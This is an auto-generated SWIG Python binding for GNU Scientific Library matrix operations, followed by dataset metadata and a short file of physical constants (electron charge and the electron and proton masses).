gsl_vector_alloc_row_from_matrix = _matrix.gsl_vector_alloc_row_from_matrix
def gsl_vector_alloc_col_from_matrix(m, j):
return _matrix.gsl_vector_alloc_col_from_matrix(m, j)
gsl_vector_alloc_col_from_matrix = _matrix.gsl_vector_alloc_col_from_matrix
def gsl_matrix_free(m):
return _matrix.gsl_matrix_free(m)
gsl_matrix_free = _matrix.gsl_matrix_free
def gsl_matrix_submatrix(m, i, j, n1, n2):
return _matrix.gsl_matrix_submatrix(m, i, j, n1, n2)
gsl_matrix_submatrix = _matrix.gsl_matrix_submatrix
def gsl_matrix_row(m, i):
return _matrix.gsl_matrix_row(m, i)
gsl_matrix_row = _matrix.gsl_matrix_row
def gsl_matrix_column(m, j):
return _matrix.gsl_matrix_column(m, j)
gsl_matrix_column = _matrix.gsl_matrix_column
def gsl_matrix_diagonal(m):
return _matrix.gsl_matrix_diagonal(m)
gsl_matrix_diagonal = _matrix.gsl_matrix_diagonal
def gsl_matrix_subdiagonal(m, k):
return _matrix.gsl_matrix_subdiagonal(m, k)
gsl_matrix_subdiagonal = _matrix.gsl_matrix_subdiagonal
def gsl_matrix_superdiagonal(m, k):
return _matrix.gsl_matrix_superdiagonal(m, k)
gsl_matrix_superdiagonal = _matrix.gsl_matrix_superdiagonal
def gsl_matrix_subrow(m, i, offset, n):
return _matrix.gsl_matrix_subrow(m, i, offset, n)
gsl_matrix_subrow = _matrix.gsl_matrix_subrow
def gsl_matrix_subcolumn(m, j, offset, n):
return _matrix.gsl_matrix_subcolumn(m, j, offset, n)
gsl_matrix_subcolumn = _matrix.gsl_matrix_subcolumn
def gsl_matrix_view_array(base, n1, n2):
return _matrix.gsl_matrix_view_array(base, n1, n2)
gsl_matrix_view_array = _matrix.gsl_matrix_view_array
def gsl_matrix_view_array_with_tda(base, n1, n2, tda):
return _matrix.gsl_matrix_view_array_with_tda(base, n1, n2, tda)
gsl_matrix_view_array_with_tda = _matrix.gsl_matrix_view_array_with_tda
def gsl_matrix_view_vector(v, n1, n2):
return _matrix.gsl_matrix_view_vector(v, n1, n2)
gsl_matrix_view_vector = _matrix.gsl_matrix_view_vector
def gsl_matrix_view_vector_with_tda(v, n1, n2, tda):
return _matrix.gsl_matrix_view_vector_with_tda(v, n1, n2, tda)
gsl_matrix_view_vector_with_tda = _matrix.gsl_matrix_view_vector_with_tda
def gsl_matrix_const_submatrix(m, i, j, n1, n2):
return _matrix.gsl_matrix_const_submatrix(m, i, j, n1, n2)
gsl_matrix_const_submatrix = _matrix.gsl_matrix_const_submatrix
def gsl_matrix_const_row(m, i):
return _matrix.gsl_matrix_const_row(m, i)
gsl_matrix_const_row = _matrix.gsl_matrix_const_row
def gsl_matrix_const_column(m, j):
return _matrix.gsl_matrix_const_column(m, j)
gsl_matrix_const_column = _matrix.gsl_matrix_const_column
def gsl_matrix_const_diagonal(m):
return _matrix.gsl_matrix_const_diagonal(m)
gsl_matrix_const_diagonal = _matrix.gsl_matrix_const_diagonal
def gsl_matrix_const_subdiagonal(m, k):
return _matrix.gsl_matrix_const_subdiagonal(m, k)
gsl_matrix_const_subdiagonal = _matrix.gsl_matrix_const_subdiagonal
def gsl_matrix_const_superdiagonal(m, k):
return _matrix.gsl_matrix_const_superdiagonal(m, k)
gsl_matrix_const_superdiagonal = _matrix.gsl_matrix_const_superdiagonal
def gsl_matrix_const_subrow(m, i, offset, n):
return _matrix.gsl_matrix_const_subrow(m, i, offset, n)
gsl_matrix_const_subrow = _matrix.gsl_matrix_const_subrow
def gsl_matrix_const_subcolumn(m, j, offset, n):
return _matrix.gsl_matrix_const_subcolumn(m, j, offset, n)
gsl_matrix_const_subcolumn = _matrix.gsl_matrix_const_subcolumn
def gsl_matrix_const_view_array(base, n1, n2):
return _matrix.gsl_matrix_const_view_array(base, n1, n2)
gsl_matrix_const_view_array = _matrix.gsl_matrix_const_view_array
def gsl_matrix_const_view_array_with_tda(base, n1, n2, tda):
return _matrix.gsl_matrix_const_view_array_with_tda(base, n1, n2, tda)
gsl_matrix_const_view_array_with_tda = _matrix.gsl_matrix_const_view_array_with_tda
def gsl_matrix_const_view_vector(v, n1, n2):
return _matrix.gsl_matrix_const_view_vector(v, n1, n2)
gsl_matrix_const_view_vector = _matrix.gsl_matrix_const_view_vector
def gsl_matrix_const_view_vector_with_tda(v, n1, n2, tda):
return _matrix.gsl_matrix_const_view_vector_with_tda(v, n1, n2, tda)
gsl_matrix_const_view_vector_with_tda = _matrix.gsl_matrix_const_view_vector_with_tda
def gsl_matrix_set_zero(m):
return _matrix.gsl_matrix_set_zero(m)
gsl_matrix_set_zero = _matrix.gsl_matrix_set_zero
def gsl_matrix_set_identity(m):
return _matrix.gsl_matrix_set_identity(m)
gsl_matrix_set_identity = _matrix.gsl_matrix_set_identity
def gsl_matrix_set_all(m, x):
return _matrix.gsl_matrix_set_all(m, x)
gsl_matrix_set_all = _matrix.gsl_matrix_set_all
def gsl_matrix_fread(stream, m):
return _matrix.gsl_matrix_fread(stream, m)
gsl_matrix_fread = _matrix.gsl_matrix_fread
def gsl_matrix_fwrite(stream, m):
return _matrix.gsl_matrix_fwrite(stream, m)
gsl_matrix_fwrite = _matrix.gsl_matrix_fwrite
def gsl_matrix_fscanf(stream, m):
return _matrix.gsl_matrix_fscanf(stream, m)
gsl_matrix_fscanf = _matrix.gsl_matrix_fscanf
def gsl_matrix_fprintf(stream, m, format):
return _matrix.gsl_matrix_fprintf(stream, m, format)
gsl_matrix_fprintf = _matrix.gsl_matrix_fprintf
def gsl_matrix_memcpy(dest, src):
return _matrix.gsl_matrix_memcpy(dest, src)
gsl_matrix_memcpy = _matrix.gsl_matrix_memcpy
def gsl_matrix_swap(m1, m2):
return _matrix.gsl_matrix_swap(m1, m2)
gsl_matrix_swap = _matrix.gsl_matrix_swap
def gsl_matrix_tricpy(uplo_src, copy_diag, dest, src):
return _matrix.gsl_matrix_tricpy(uplo_src, copy_diag, dest, src)
gsl_matrix_tricpy = _matrix.gsl_matrix_tricpy
def gsl_matrix_swap_rows(m, i, j):
return _matrix.gsl_matrix_swap_rows(m, i, j)
gsl_matrix_swap_rows = _matrix.gsl_matrix_swap_rows
def gsl_matrix_swap_columns(m, i, j):
return _matrix.gsl_matrix_swap_columns(m, i, j)
gsl_matrix_swap_columns = _matrix.gsl_matrix_swap_columns
def gsl_matrix_swap_rowcol(m, i, j):
return _matrix.gsl_matrix_swap_rowcol(m, i, j)
gsl_matrix_swap_rowcol = _matrix.gsl_matrix_swap_rowcol
def gsl_matrix_transpose(m):
return _matrix.gsl_matrix_transpose(m)
gsl_matrix_transpose = _matrix.gsl_matrix_transpose
def gsl_matrix_transpose_memcpy(dest, src):
return _matrix.gsl_matrix_transpose_memcpy(dest, src)
gsl_matrix_transpose_memcpy = _matrix.gsl_matrix_transpose_memcpy
def gsl_matrix_transpose_tricpy(uplo_src, copy_diag, dest, src):
return _matrix.gsl_matrix_transpose_tricpy(uplo_src, copy_diag, dest, src)
gsl_matrix_transpose_tricpy = _matrix.gsl_matrix_transpose_tricpy
def gsl_matrix_max(m):
return _matrix.gsl_matrix_max(m)
gsl_matrix_max = _matrix.gsl_matrix_max
def gsl_matrix_min(m):
return _matrix.gsl_matrix_min(m)
gsl_matrix_min = _matrix.gsl_matrix_min
def gsl_matrix_minmax(m, min_out, max_out):
return _matrix.gsl_matrix_minmax(m, min_out, max_out)
gsl_matrix_minmax = _matrix.gsl_matrix_minmax
def gsl_matrix_max_index(m, imax, jmax):
return _matrix.gsl_matrix_max_index(m, imax, jmax)
gsl_matrix_max_index = _matrix.gsl_matrix_max_index
def gsl_matrix_min_index(m, imin, jmin):
return _matrix.gsl_matrix_min_index(m, imin, jmin)
gsl_matrix_min_index = _matrix.gsl_matrix_min_index
def gsl_matrix_minmax_index(m, imin, jmin, imax, jmax):
return _matrix.gsl_matrix_minmax_index(m, imin, jmin, imax, jmax)
gsl_matrix_minmax_index = _matrix.gsl_matrix_minmax_index
def gsl_matrix_equal(a, b):
return _matrix.gsl_matrix_equal(a, b)
gsl_matrix_equal = _matrix.gsl_matrix_equal
def gsl_matrix_isnull(m):
return _matrix.gsl_matrix_isnull(m)
gsl_matrix_isnull = _matrix.gsl_matrix_isnull
def gsl_matrix_ispos(m):
return _matrix.gsl_matrix_ispos(m)
gsl_matrix_ispos = _matrix.gsl_matrix_ispos
def gsl_matrix_isneg(m):
return _matrix.gsl_matrix_isneg(m)
gsl_matrix_isneg = _matrix.gsl_matrix_isneg
def gsl_matrix_isnonneg(m):
return _matrix.gsl_matrix_isnonneg(m)
gsl_matrix_isnonneg = _matrix.gsl_matrix_isnonneg
def gsl_matrix_add(a, b):
return _matrix.gsl_matrix_add(a, b)
gsl_matrix_add = _matrix.gsl_matrix_add
def gsl_matrix_sub(a, b):
return _matrix.gsl_matrix_sub(a, b)
gsl_matrix_sub = _matrix.gsl_matrix_sub
def gsl_matrix_mul_elements(a, b):
return _matrix.gsl_matrix_mul_elements(a, b)
gsl_matrix_mul_elements = _matrix.gsl_matrix_mul_elements
def gsl_matrix_div_elements(a, b):
return _matrix.gsl_matrix_div_elements(a, b)
gsl_matrix_div_elements = _matrix.gsl_matrix_div_elements
def gsl_matrix_scale(a, x):
return _matrix.gsl_matrix_scale(a, x)
gsl_matrix_scale = _matrix.gsl_matrix_scale
def gsl_matrix_add_constant(a, x):
return _matrix.gsl_matrix_add_constant(a, x)
gsl_matrix_add_constant = _matrix.gsl_matrix_add_constant
def gsl_matrix_add_diagonal(a, x):
return _matrix.gsl_matrix_add_diagonal(a, x)
gsl_matrix_add_diagonal = _matrix.gsl_matrix_add_diagonal
def gsl_matrix_get_row(v, m, i):
return _matrix.gsl_matrix_get_row(v, m, i)
gsl_matrix_get_row = _matrix.gsl_matrix_get_row
def gsl_matrix_get_col(v, m, j):
return _matrix.gsl_matrix_get_col(v, m, j)
gsl_matrix_get_col = _matrix.gsl_matrix_get_col
def gsl_matrix_set_row(m, i, v):
return _matrix.gsl_matrix_set_row(m, i, v)
gsl_matrix_set_row = _matrix.gsl_matrix_set_row
def gsl_matrix_set_col(m, j, v):
return _matrix.gsl_matrix_set_col(m, j, v)
gsl_matrix_set_col = _matrix.gsl_matrix_set_col
def gsl_matrix_get(m, i, j):
return _matrix.gsl_matrix_get(m, i, j)
gsl_matrix_get = _matrix.gsl_matrix_get
def gsl_matrix_set(m, i, j, x):
return _matrix.gsl_matrix_set(m, i, j, x)
gsl_matrix_set = _matrix.gsl_matrix_set
def gsl_matrix_ptr(m, i, j):
return _matrix.gsl_matrix_ptr(m, i, j)
gsl_matrix_ptr = _matrix.gsl_matrix_ptr
def gsl_matrix_const_ptr(m, i, j):
return _matrix.gsl_matrix_const_ptr(m, i, j)
gsl_matrix_const_ptr = _matrix.gsl_matrix_const_ptr
class gsl_matrix_float(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, gsl_matrix_float, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, gsl_matrix_float, name)
__repr__ = _swig_repr
__swig_setmethods__["size1"] = _matrix.gsl_matrix_float_size1_set
__swig_getmethods__["size1"] = _matrix.gsl_matrix_float_size1_get
if _newclass:
size1 = _swig_property(_matrix.gsl_matrix_float_size1_get, _matrix.gsl_matrix_float_size1_set)
__swig_setmethods__["size2"] = _matrix.gsl_matrix_float_size2_set
__swig_getmethods__["size2"] = _matrix.gsl_matrix_float_size2_get
if _newclass:
size2 = _swig_property(_matrix.gsl_matrix_float_size2_get, _matrix.gsl_matrix_float_size2_set)
__swig_setmethods__["tda"] = _matrix.gsl_matrix_float_tda_set
__swig_getmethods__["tda"] = _matrix.gsl_matrix_float_tda_get
if _newclass:
tda = _swig_property(_matrix.gsl_matrix_float_tda_get, _matrix.gsl_matrix_float_tda_set)
__swig_setmethods__["data"] = _matrix.gsl_matrix_float_data_set
__swig_getmethods__["data"] = _matrix.gsl_matrix_float_data_get
if _newclass:
data = _swig_property(_matrix.gsl_matrix_float_data_get, _matrix.gsl_matrix_float_data_set)
__swig_setmethods__["block"] = _matrix.gsl_matrix_float_block_set
__swig_getmethods__["block"] = _matrix.gsl_matrix_float_block_get
if _newclass:
block = _swig_property(_matrix.gsl_matrix_float_block_get, _matrix.gsl_matrix_float_block_set)
__swig_setmethods__["owner"] = _matrix.gsl_matrix_float_owner_set
__swig_getmethods__["owner"] = _matrix.gsl_matrix_float_owner_get
if _newclass:
owner = _swig_property(_matrix.gsl_matrix_float_owner_get, _matrix.gsl_matrix_float_owner_set)
def __init__(self, m, n):
this = _matrix.new_gsl_matrix_float(m, n)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _matrix.delete_gsl_matrix_float
__del__ = lambda self: None
def nrows(self):
return _matrix.gsl_matrix_float_nrows(self)
def ncols(self):
return _matrix.gsl_matrix_float_ncols(self)
def __getitem__(self, m, n):
return _matrix.gsl_matrix_float___getitem__(self, m, n)
def __setitem__(self, item, n, m):
return _matrix.gsl_matrix_float___setitem__(self, item, n, m)
gsl_matrix_float_swigregister = _matrix.gsl_matrix_float_swigregister
gsl_matrix_float_swigregister(gsl_matrix_float)
class _gsl_matrix_float_view(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, _gsl_matrix_float_view, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, _gsl_matrix_float_view, name)
__repr__ = _swig_repr
__swig_setmethods__["matrix"] = _matrix._gsl_matrix_float_view_matrix_set
__swig_getmethods__["matrix"] = _matrix._gsl_matrix_float_view_matrix_get
if _newclass:
matrix = _swig_property(_matrix._gsl_matrix_float_view_matrix_get, _matrix._gsl_matrix_float_view_matrix_set)
def __init__(self):
this = _matrix.new__gsl_matrix_float_view()
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _matrix.delete__gsl_matrix_float_view
__del__ = lambda self: None
_gsl_matrix_float_view_swigregister = _matrix._gsl_matrix_float_view_swigregister
_gsl_matrix_float_view_swigregister(_gsl_matrix_float_view)
class _gsl_matrix_float_const_view(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, _gsl_matrix_float_const_view, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, _gsl_matrix_float_const_view, name)
__repr__ = _swig_repr
__swig_setmethods__["matrix"] = _matrix._gsl_matrix_float_const_view_matrix_set
__swig_getmethods__["matrix"] = _matrix._gsl_matrix_float_const_view_matrix_get
if _newclass:
matrix = _swig_property(_matrix._gsl_matrix_float_const_view_matrix_get, _matrix._gsl_matrix_float_const_view_matrix_set)
def __init__(self):
this = _matrix.new__gsl_matrix_float_const_view()
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _matrix.delete__gsl_matrix_float_const_view
__del__ = lambda self: None
_gsl_matrix_float_const_view_swigregister = _matrix._gsl_matrix_float_const_view_swigregister
_gsl_matrix_float_const_view_swigregister(_gsl_matrix_float_const_view)
def gsl_matrix_float_alloc(n1, n2):
return _matrix.gsl_matrix_float_alloc(n1, n2)
gsl_matrix_float_alloc = _matrix.gsl_matrix_float_alloc
def gsl_matrix_float_calloc(n1, n2):
return _matrix.gsl_matrix_float_calloc(n1, n2)
gsl_matrix_float_calloc = _matrix.gsl_matrix_float_calloc
def gsl_matrix_float_alloc_from_block(b, offset, n1, n2, d2):
return _matrix.gsl_matrix_float_alloc_from_block(b, offset, n1, n2, d2)
gsl_matrix_float_alloc_from_block = _matrix.gsl_matrix_float_alloc_from_block
def gsl_matrix_float_alloc_from_matrix(m, k1, k2, n1, n2):
return _matrix.gsl_matrix_float_alloc_from_matrix(m, k1, k2, n1, n2)
gsl_matrix_float_alloc_from_matrix = _matrix.gsl_matrix_float_alloc_from_matrix
def gsl_vector_float_alloc_row_from_matrix(m, i):
return _matrix.gsl_vector_float_alloc_row_from_matrix(m, i)
gsl_vector_float_alloc_row_from_matrix = _matrix.gsl_vector_float_alloc_row_from_matrix
def gsl_vector_float_alloc_col_from_matrix(m, j):
return _matrix.gsl_vector_float_alloc_col_from_matrix(m, j)
gsl_vector_float_alloc_col_from_matrix = _matrix.gsl_vector_float_alloc_col_from_matrix
def gsl_matrix_float_free(m):
return _matrix.gsl_matrix_float_free(m)
gsl_matrix_float_free = _matrix.gsl_matrix_float_free
def gsl_matrix_float_submatrix(m, i, j, n1, n2):
return _matrix.gsl_matrix_float_submatrix(m, i, j, n1, n2)
gsl_matrix_float_submatrix = _matrix.gsl_matrix_float_submatrix
def gsl_matrix_float_row(m, i):
return _matrix.gsl_matrix_float_row(m, i)
gsl_matrix_float_row = _matrix.gsl_matrix_float_row
def gsl_matrix_float_column(m, j):
return _matrix.gsl_matrix_float_column(m, j)
gsl_matrix_float_column = _matrix.gsl_matrix_float_column
def gsl_matrix_float_diagonal(m):
return _matrix.gsl_matrix_float_diagonal(m)
gsl_matrix_float_diagonal = _matrix.gsl_matrix_float_diagonal
def gsl_matrix_float_subdiagonal(m, k):
return _matrix.gsl_matrix_float_subdiagonal(m, k)
gsl_matrix_float_subdiagonal = _matrix.gsl_matrix_float_subdiagonal
def gsl_matrix_float_superdiagonal(m, k):
return _matrix.gsl_matrix_float_superdiagonal(m, k)
gsl_matrix_float_superdiagonal = _matrix.gsl_matrix_float_superdiagonal
def gsl_matrix_float_subrow(m, i, offset, n):
return _matrix.gsl_matrix_float_subrow(m, i, offset, n)
gsl_matrix_float_subrow = _matrix.gsl_matrix_float_subrow
def gsl_matrix_float_subcolumn(m, j, offset, n):
return _matrix.gsl_matrix_float_subcolumn(m, j, offset, n)
gsl_matrix_float_subcolumn = _matrix.gsl_matrix_float_subcolumn
def gsl_matrix_float_view_array(base, n1, n2):
return _matrix.gsl_matrix_float_view_array(base, n1, n2)
gsl_matrix_float_view_array = _matrix.gsl_matrix_float_view_array
def gsl_matrix_float_view_array_with_tda(base, n1, n2, tda):
return _matrix.gsl_matrix_float_view_array_with_tda(base, n1, n2, tda)
gsl_matrix_float_view_array_with_tda = _matrix.gsl_matrix_float_view_array_with_tda
def gsl_matrix_float_view_vector(v, n1, n2):
return _matrix.gsl_matrix_float_view_vector(v, n1, n2)
gsl_matrix_float_view_vector = _matrix.gsl_matrix_float_view_vector
def gsl_matrix_float_view_vector_with_tda(v, n1, n2, tda):
return _matrix.gsl_matrix_float_view_vector_with_tda(v, n1, n2, tda)
gsl_matrix_float_view_vector_with_tda = _matrix.gsl_matrix_float_view_vector_with_tda
def gsl_matrix_float_const_submatrix(m, i, j, n1, n2):
return _matrix.gsl_matrix_float_const_submatrix(m, i, j, n1, n2)
gsl_matrix_float_const_submatrix = _matrix.gsl_matrix_float_const_submatrix
def gsl_matrix_float_const_row(m, i):
return _matrix.gsl_matrix_float_const_row(m, i)
gsl_matrix_float_const_row = _matrix.gsl_matrix_float_const_row
def gsl_matrix_float_const_column(m, j):
return _matrix.gsl_matrix_float_const_column(m, j)
gsl_matrix_float_const_column = _matrix.gsl_matrix_float_const_column
def gsl_matrix_float_const_diagonal(m):
return _matrix.gsl_matrix_float_const_diagonal(m)
gsl_matrix_float_const_diagonal = _matrix.gsl_matrix_float_const_diagonal
def gsl_matrix_float_const_subdiagonal(m, k):
return _matrix.gsl_matrix_float_const_subdiagonal(m, k)
gsl_matrix_float_const_subdiagonal = _matrix.gsl_matrix_float_const_subdiagonal
def gsl_matrix_float_const_superdiagonal(m, k):
return _matrix.gsl_matrix_float_const_superdiagonal(m, k)
gsl_matrix_float_const_superdiagonal = _matrix.gsl_matrix_float_const_superdiagonal
def gsl_matrix_float_const_subrow(m, i, offset, n):
return _matrix.gsl_matrix_float_const_subrow(m, i, offset, n)
gsl_matrix_float_const_subrow = _matrix.gsl_matrix_float_const_subrow
def gsl_matrix_float_const_subcolumn(m, j, offset, n):
return _matrix.gsl_matrix_float_const_subcolumn(m, j, offset, n)
gsl_matrix_float_const_subcolumn = _matrix.gsl_matrix_float_const_subcolumn
def gsl_matrix_float_const_view_array(base, n1, n2):
return _matrix.gsl_matrix_float_const_view_array(base, n1, n2)
gsl_matrix_float_const_view_array = _matrix.gsl_matrix_float_const_view_array
def gsl_matrix_float_const_view_array_with_tda(base, n1, n2, tda):
return _matrix.gsl_matrix_float_const_view_array_with_tda(base, n1, n2, tda)
gsl_matrix_float_const_view_array_with_tda = _matrix.gsl_matrix_float_const_view_array_with_tda
def gsl_matrix_float_const_view_vector(v, n1, n2):
return _matrix.gsl_matrix_float_const_view_vector(v, n1, n2)
gsl_matrix_float_const_view_vector = _matrix.gsl_matrix_float_const_view_vector
def gsl_matrix_float_const_view_vector_with_tda(v, n1, n2, tda):
return _matrix.gsl_matrix_float_const_view_vector_with_tda(v, n1, n2, tda)
gsl_matrix_float_const_view_vector_with_tda = _matrix.gsl_matrix_float_const_view_vector_with_tda
def gsl_matrix_float_set_zero(m):
return _matrix.gsl_matrix_float_set_zero(m)
gsl_matrix_float_set_zero = _matrix.gsl_matrix_float_set_zero
def gsl_matrix_float_set_identity(m):
return _matrix.gsl_matrix_float_set_identity(m)
gsl_matrix_float_set_identity = _matrix.gsl_matrix_float_set_identity
def gsl_matrix_float_set_all(m, x):
return _matrix.gsl_matrix_float_set_all(m, x)
gsl_matrix_float_set_all = _matrix.gsl_matrix_float_set_all
def gsl_matrix_float_fread(stream, m):
return _matrix.gsl_matrix_float_fread(stream, m)
gsl_matrix_float_fread = _matrix.gsl_matrix_float_fread
def gsl_matrix_float_fwrite(stream, m):
return _matrix.gsl_matrix_float_fwrite(stream, m)
gsl_matrix_float_fwrite = _matrix.gsl_matrix_float_fwrite
def gsl_matrix_float_fscanf(stream, m):
return _matrix.gsl_matrix_float_fscanf(stream, m)
gsl_matrix_float_fscanf = _matrix.gsl_matrix_float_fscanf
def gsl_matrix_float_fprintf(stream, m, format):
return _matrix.gsl_matrix_float_fprintf(stream, m, format)
gsl_matrix_float_fprintf = _matrix.gsl_matrix_float_fprintf
def gsl_matrix_float_memcpy(dest, src):
return _matrix.gsl_matrix_float_memcpy(dest, src)
gsl_matrix_float_memcpy = _matrix.gsl_matrix_float_memcpy
def gsl_matrix_float_swap(m1, m2):
return _matrix.gsl_matrix_float_swap(m1, m2)
gsl_matrix_float_swap = _matrix.gsl_matrix_float_swap
def gsl_matrix_float_tricpy(uplo_src, copy_diag, dest, src):
return _matrix.gsl_matrix_float_tricpy(uplo_src, copy_diag, dest, src)
gsl_matrix_float_tricpy = _matrix.gsl_matrix_float_tricpy
def gsl_matrix_float_swap_rows(m, i, j):
return _matrix.gsl_matrix_float_swap_rows(m, i, j)
gsl_matrix_float_swap_rows = _matrix.gsl_matrix_float_swap_rows
def gsl_matrix_float_swap_columns(m, i, j):
return _matrix.gsl_matrix_float_swap_columns(m, i, j)
gsl_matrix_float_swap_columns = _matrix.gsl_matrix_float_swap_columns
def gsl_matrix_float_swap_rowcol(m, i, j):
return _matrix.gsl_matrix_float_swap_rowcol(m, i, j)
gsl_matrix_float_swap_rowcol = _matrix.gsl_matrix_float_swap_rowcol
def gsl_matrix_float_transpose(m):
return _matrix.gsl_matrix_float_transpose(m)
gsl_matrix_float_transpose = _matrix.gsl_matrix_float_transpose
def gsl_matrix_float_transpose_memcpy(dest, src):
return _matrix.gsl_matrix_float_transpose_memcpy(dest, src)
gsl_matrix_float_transpose_memcpy = _matrix.gsl_matrix_float_transpose_memcpy
def gsl_matrix_float_transpose_tricpy(uplo_src, copy_diag, dest, src):
return _matrix.gsl_matrix_float_transpose_tricpy(uplo_src, copy_diag, dest, src)
gsl_matrix_float_transpose_tricpy = _matrix.gsl_matrix_float_transpose_tricpy
def gsl_matrix_float_max(m):
return _matrix.gsl_matrix_float_max(m)
gsl_matrix_float_max = _matrix.gsl_matrix_float_max
def gsl_matrix_float_min(m):
return _matrix.gsl_matrix_float_min(m)
gsl_matrix_float_min = _matrix.gsl_matrix_float_min
def gsl_matrix_float_minmax(m, min_out, max_out):
return _matrix.gsl_matrix_float_minmax(m, min_out, max_out)
gsl_matrix_float_minmax = _matrix.gsl_matrix_float_minmax
def gsl_matrix_float_max_index(m, imax, jmax):
return _matrix.gsl_matrix_float_max_index(m, imax, jmax)
gsl_matrix_float_max_index = _matrix.gsl_matrix_float_max_index
def gsl_matrix_float_min_index(m, imin, jmin):
return _matrix.gsl_matrix_float_min_index(m, imin, jmin)
gsl_matrix_float_min_index = _matrix.gsl_matrix_float_min_index
def gsl_matrix_float_minmax_index(m, imin, jmin, imax, jmax):
return _matrix.gsl_matrix_float_minmax_index(m, imin, jmin, imax, jmax)
gsl_matrix_float_minmax_index = _matrix.gsl_matrix_float_minmax_index
def gsl_matrix_float_equal(a, b):
return _matrix.gsl_matrix_float_equal(a, b)
gsl_matrix_float_equal = _matrix.gsl_matrix_float_equal
def gsl_matrix_float_isnull(m):
return _matrix.gsl_matrix_float_isnull(m)
gsl_matrix_float_isnull = _matrix.gsl_matrix_float_isnull
def gsl_matrix_float_ispos(m):
return _matrix.gsl_matrix_float_ispos(m)
gsl_matrix_float_ispos = _matrix.gsl_matrix_float_ispos
def gsl_matrix_float_isneg(m):
return _matrix.gsl_matrix_float_isneg(m)
gsl_matrix_float_isneg = _matrix.gsl_matrix_float_isneg
def gsl_matrix_float_isnonneg(m):
return _matrix.gsl_matrix_float_isnonneg(m)
gsl_matrix_float_isnonneg = _matrix.gsl_matrix_float_isnonneg
def gsl_matrix_float_add(a, b):
return _matrix.gsl_matrix_float_add(a, b)
gsl_matrix_float_add = _matrix.gsl_matrix_float_add
def gsl_matrix_float_sub(a, b):
return _matrix.gsl_matrix_float_sub(a, b)
gsl_matrix_float_sub = _matrix.gsl_matrix_float_sub
def gsl_matrix_float_mul_elements(a, b):
return _matrix.gsl_matrix_float_mul_elements(a, b)
gsl_matrix_float_mul_elements = _matrix.gsl_matrix_float_mul_elements
def gsl_matrix_float_div_elements(a, b):
return _matrix.gsl_matrix_float_div_elements(a, b)
gsl_matrix_float_div_elements = _matrix.gsl_matrix_float_div_elements
def gsl_matrix_float_scale(a, x):
return _matrix.gsl_matrix_float_scale(a, x)
gsl_matrix_float_scale = _matrix.gsl_matrix_float_scale
def gsl_matrix_float_add_constant(a, x):
return _matrix.gsl_matrix_float_add_constant(a, x)
gsl_matrix_float_add_constant = _matrix.gsl_matrix_float_add_constant
def gsl_matrix_float_add_diagonal(a, x):
return _matrix.gsl_matrix_float_add_diagonal(a, x)
gsl_matrix_float_add_diagonal = _matrix.gsl_matrix_float_add_diagonal
def gsl_matrix_float_get_row(v, m, i):
return _matrix.gsl_matrix_float_get_row(v, m, i)
gsl_matrix_float_get_row = _matrix.gsl_matrix_float_get_row
def gsl_matrix_float_get_col(v, m, j):
return _matrix.gsl_matrix_float_get_col(v, m, j)
gsl_matrix_float_get_col = _matrix.gsl_matrix_float_get_col
def gsl_matrix_float_set_row(m, i, v):
return _matrix.gsl_matrix_float_set_row(m, i, v)
gsl_matrix_float_set_row = _matrix.gsl_matrix_float_set_row
def gsl_matrix_float_set_col(m, j, v):
return _matrix.gsl_matrix_float_set_col(m, j, v)
gsl_matrix_float_set_col = _matrix.gsl_matrix_float_set_col
def gsl_matrix_float_get(m, i, j):
return _matrix.gsl_matrix_float_get(m, i, j)
gsl_matrix_float_get = _matrix.gsl_matrix_float_get
def gsl_matrix_float_set(m, i, j, x):
return _matrix.gsl_matrix_float_set(m, i, j, x)
gsl_matrix_float_set = _matrix.gsl_matrix_float_set
def gsl_matrix_float_ptr(m, i, j):
return _matrix.gsl_matrix_float_ptr(m, i, j)
gsl_matrix_float_ptr = _matrix.gsl_matrix_float_ptr
def gsl_matrix_float_const_ptr(m, i, j):
return _matrix.gsl_matrix_float_const_ptr(m, i, j)
gsl_matrix_float_const_ptr = _matrix.gsl_matrix_float_const_ptr
def gsl_matrix_float_load(m, filename, old=False):
return _matrix.gsl_matrix_float_load(m, filename, old)
gsl_matrix_float_load = _matrix.gsl_matrix_float_load
def gsl_matrix_float_resize(m, size1, size2):
return _matrix.gsl_matrix_float_resize(m, size1, size2)
gsl_matrix_float_resize = _matrix.gsl_matrix_float_resize
# This file is compatible with both classic and new-style classes.
| 39.460067
| 129
| 0.796978
| 5,468
| 35,080
| 4.472385
| 0.040234
| 0.258352
| 0.224494
| 0.151298
| 0.882151
| 0.730117
| 0.601349
| 0.477857
| 0.32615
| 0.254467
| 0
| 0.005918
| 0.128107
| 35,080
| 888
| 130
| 39.504505
| 0.793631
| 0.008409
| 0
| 0.157143
| 1
| 0
| 0.008684
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.24
| false
| 0.002857
| 0.027143
| 0.224286
| 0.575714
| 0.008571
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 8
|
b385bf3c79066a539bb289577e02a20ed3586d01
| 3,918
|
py
|
Python
|
spin_tools/physics/constants.py
|
jaywalker9999/spin_tools
|
0f730234a1fae49aecb8cbc5b0eeb28e64832e96
|
[
"MIT"
] | null | null | null |
spin_tools/physics/constants.py
|
jaywalker9999/spin_tools
|
0f730234a1fae49aecb8cbc5b0eeb28e64832e96
|
[
"MIT"
] | null | null | null |
spin_tools/physics/constants.py
|
jaywalker9999/spin_tools
|
0f730234a1fae49aecb8cbc5b0eeb28e64832e96
|
[
"MIT"
] | null | null | null |
e = 1.602176634e-19 # C
m_e = 9.1093837015e-31 #keg
m_p = 1.67262192369e-27 # kg
